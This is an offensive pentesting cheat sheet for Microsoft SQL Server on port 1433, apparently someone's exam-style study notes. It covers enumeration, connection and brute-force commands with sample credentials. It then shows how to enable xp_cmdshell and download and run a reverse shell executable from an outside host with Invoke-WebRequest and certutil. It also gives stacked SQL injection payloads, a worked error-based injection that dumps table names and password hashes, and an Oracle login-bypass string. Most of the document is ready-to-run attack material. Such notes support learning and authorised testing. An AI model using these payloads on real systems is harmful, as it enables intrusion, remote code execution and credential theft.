x

MSSQL (1433)

MSSQL is an SQL server implemented by MS.

If MSSQL is configured to listen on this port (often the default setting) then applications can access the server to interact with the SQL database.

Connection & Enumeration

Check 10.3 - Manual & Automated Code Execution first. 

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $IP

Connect

impacket-sqlclient.py username@10.10.10.5 -windows-auth

Make sure to check without windows auth for local users, users like sa often don't work with the --windows-auth flag. 

impacket-sqlclient.py sa@10.10.10.5

Linux 

sqsh -S $IP -U sa -P CrimsonQuiltScalp193

Windows 

proxychains sqsh -S 10.10.126.148 -U example.com\\sql_service -P password123 -D msdb

Bruteforcing

Crackmapexec works well when working within an AD environment 

proxychains crackmapexec mssql -d example.com -u sql_service -p password123  -x "whoami" 10.10.126.148

proxychains crackmapexec mssql -d example.com -u sql_service -p password123  -x "whoami" 10.10.126.148 -q 'SELECT name FROM master.dbo.sysdatabases;'

Hydra with a relevant combination pair 

hydra -C SecLists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt 192.168.207.183 mssql

Exploitation

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go
xp_cmdshell 'powershell "Invoke-WebRequest -Uri http://10.10.126.147:7781/rshell.exe -OutFile c:\Users\Public\reverse.exe"'
go
xp_cmdshell 'c:\Users\Public\reverse.exe"'
go

Simple Query 

select * from Employees WHERE Department = 'HR';

MSSQL login page injection

https://www.tarlogic.com/blog/red-team-tales-0x01/

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md#mssql-command-execution 

';EXEC master.dbo.xp_cmdshell 'ping 192.168.119.184';--

';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://192.168.119.184:443/shell.exe C:\\Windows\temp\shell.exe';--

';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\Windows\\temp\\shell.exe';--

MSSQL Error DB dumping creds

https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/

Example case
' #Entered
Unclosed quotation mark after the character string '',')'. #response
Visualize the SQL statement being made
insert into dbo.tablename ('',''); 
#two statements Username and Email. Web Server says User added which indicates an insert statement

#we want to imagine what the query could potentially look like so we did a mock example above

insert into dbo.tablename (''',); #this would be created as an example of the error message above
Adjusting our initial Payload
insert into dbo.tablename ('1 AND 1=CONVERT(INT,@@version))--' ,''); #This is what is looks like

insert into dbo.tablename('',1 AND 1=CONVERT(INT,@@version))-- #Correct payload based on the above

',1 AND 1=CONVERT(INT,@@version))-- #Enumerate the DB

Server Error in '/Newsletter' Application.#Response

Incorrect syntax near the keyword 'AND'. #Response

',CONVERT(INT,@@version))-- #Corrected Payoad to adjust for the error
Enumerating DB Names
', CONVERT(INT,db_name(1)))--
master
', CONVERT(INT,db_name(2)))--
tempdb
', CONVERT(INT,db_name(3)))--
model
', CONVERT(INT,db_name(4)))--
msdb
', CONVERT(INT,db_name(5)))--
newsletter
', CONVERT(INT,db_name(6)))--
archive
Enumerating Table Names
', CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top 1 TABLE_NAME FROM archive.information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58))))--
pEXAMPLE
Enumerating number of Columns in selected Table
', CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='pEXAMPLE')+CHAR(58)+CHAR(58))))--
3 entries
Enumerate Column Names
', CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top 1 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='pEXAMPLE' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58))))--
alogin

', CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top 2 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='pEXAMPLE' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58))))--
id

', CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top 3 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='pEXAMPLE' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58))))--
psw
Enumerating Data in Columns
', CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 psw FROM (SELECT top 1 psw FROM archive..pEXAMPLE ORDER BY psw ASC) sq ORDER BY psw DESC)+CHAR(58)+CHAR(58))))--
3c744b99b8623362b466efb7203fd182

', CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 psw FROM (SELECT top 2 psw FROM archive..pEXAMPLE ORDER BY psw ASC) sq ORDER BY psw DESC)+CHAR(58)+CHAR(58))))--
5b413fe170836079622f4131fe6efa2d

', CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 psw FROM (SELECT top 3 psw FROM archive..pEXAMPLE ORDER BY psw ASC) sq ORDER BY psw DESC)+CHAR(58)+CHAR(58))))--
7de6b6f0afadd89c3ed558da43930181

', CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 psw FROM (SELECT top 4 psw FROM archive..pEXAMPLE ORDER BY psw ASC) sq ORDER BY psw DESC)+CHAR(58)+CHAR(58))))--
cb2d5be3c78be06d47b697468ad3b33b

Oracle DB bypass login

admin ' OR 1=1 --

Oracle UNION DB dumping creds

https://web.archive.org/web/20220727065022/https://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html

Tags

Left-click: follow link, Right-click: select node, Scroll: zoom
x